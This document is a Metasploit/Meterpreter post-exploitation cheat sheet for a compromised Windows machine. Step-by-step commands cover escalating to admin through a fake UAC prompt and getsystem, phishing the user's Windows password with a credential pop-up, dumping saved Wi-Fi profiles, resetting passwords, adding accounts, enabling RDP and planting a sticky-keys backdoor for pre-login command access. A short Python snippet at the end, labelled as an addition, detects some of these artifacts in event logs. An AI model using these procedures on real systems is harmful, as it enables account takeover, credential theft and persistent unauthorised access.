
Meter Preter

The document outlines various operations and commands for using Metasploit to interact with a target machine, including taking screenshots, checking idle time, and obtaining admin access. It details commands for gathering Wi-Fi information, performing phishing attacks, creating new users, and enabling Remote Desktop connections. Additionally, it explains how to access the command prompt on the target machine without logging in using sticky keys.

METASPLOIT

Session-2
Operation-Take screenshot of target machine
Command- screenshot

The file is stored in the root folder.

Operation- To show idle time of target machine


Command-idletime

Operation- To show the disk details of target machine
Command- show_mount

Operation- Enable or Disable target machine’s keyboard


Command- uictl disablekeyboard

Command- uictl enablekeyboard

Operation- Display the user that the Meterpreter server is running as on the host
Command- getuid

Operation- Get the Admin User access of Target’s machine.


The user will get a pop-up asking to provide admin access
First background the current session

Command- background

Use the module below to get admin access

Command- use windows/local/ask

Set the session id for the module

Command- set session <id>

Command- run

The target machine will get a pop-up

To get admin user access of the host machine

Command- getsystem

To see current user

Command- getuid

Operation- Get the Wi-Fi information for all networks the target machine has connected to so far
To search the correct wireless module

Command- search wireless

Command– use windows/wlan/wlan_profile or use <module no.>

Command- set session <id>

Command– run

Currently no wi-fi information available

Operation- Get admin access of machine directly
Command- use multi/handler

Command- run

On the Windows machine, run the mal.exe file as an Admin. Meterpreter access is granted this way as well

Target user provides the password on pop up

Command- getsystem

This time we got the admin access directly

Command- getuid

Operation- Phishing attack to get a Windows Security pop-up on the target machine that the user needs to fill in before performing any operation

Command- search phish

Command- windows/gather/phish_windows_credentials

Command- set session <id>

Command– run

On the Windows machine we'll get the pop-up

The Windows password will be displayed on Kali once the user enters their password

Operation- Create a new user in target machine and change its password
To interact with the session

Command- sessions -i <id>

To get the access of command prompt

Command- shell

To show all the users

Command- net user

Change password for existing user

Command- net user <ExistingUserName> <new_password>

Changed the password for user- “gatson” to 1234

To add a new user

Command- net user <NewUserToAdd> /add

Operation- Take Remote Desktop connection of Target machine


Command- search rdp

Command- use windows/manage/enable_rdp

Command- set session <id>

Command- run

To check if RDP is up, open a new terminal and run the following commands

Command- nmap -p3389 <Target Machine IP>

NotePort no- 3389 is used for Remote Desktop Connection

Command- rdesktop <Target Machine IP>

Remote Desktop got enabled

Operation- Get target machine’s command prompt access even without logging in to the client machine (using sticky keys)
Command- search rdp

Command- use windows/manage/sticky_keys

Command- rdesktop <target machine id>

Press Shift keys 5 times, it will open the command prompt
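
From the defender's side, the user-account, RDP and sticky-keys operations above leave recognisable host artifacts. The following added example (not part of the original document) triages constructed event records for them; the event dict layout, sample values and function names are assumptions, and it covers only the registry-based sticky-keys variant (an Image File Execution Options Debugger value).

```python
import re

# Constructed sample telemetry (assumed layout): Windows Security events
# 4720 (account created) / 4724 (password reset) and Sysmon event 13
# (registry value set), reduced to plain dicts.
SAMPLE_EVENTS = [
    {"id": 4624, "source": "Security", "target_user": "gatson"},
    {"id": 4724, "source": "Security", "target_user": "gatson"},
    {"id": 4720, "source": "Security", "target_user": "newuser"},
    {"id": 13, "source": "Sysmon",
     "target_object": r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "details": "DWORD (0x00000000)"},
    {"id": 13, "source": "Sysmon",
     "target_object": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger",
     "details": r"C:\Windows\System32\cmd.exe"},
    {"id": 13, "source": "Sysmon",
     "target_object": r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "details": "DWORD (0x00000001)"},
]

# Accessibility programs that can be launched from the logon screen.
IFEO_RE = re.compile(
    r"\\Image File Execution Options\\(sethc|utilman|osk|magnify|narrator|displayswitch)\.exe\\Debugger$",
    re.IGNORECASE)
RDP_RE = re.compile(r"\\Control\\Terminal Server\\fDenyTSConnections$", re.IGNORECASE)

def classify(event):
    """Return a finding label for one event, or None if it is not of interest."""
    if event["source"] == "Security":
        if event["id"] == 4720:
            return f"account created: {event['target_user']}"
        if event["id"] == 4724:
            return f"password reset: {event['target_user']}"
        return None
    if event["source"] == "Sysmon" and event["id"] == 13:
        match = IFEO_RE.search(event["target_object"])
        if match:
            return f"logon-screen debugger set on {match.group(1).lower()}.exe"
        # fDenyTSConnections = 0 means Remote Desktop connections are allowed.
        if RDP_RE.search(event["target_object"]) and event["details"].strip().endswith("(0x00000000)"):
            return "RDP enabled"
    return None

def triage(events):
    return [finding for finding in map(classify, events) if finding]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```
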
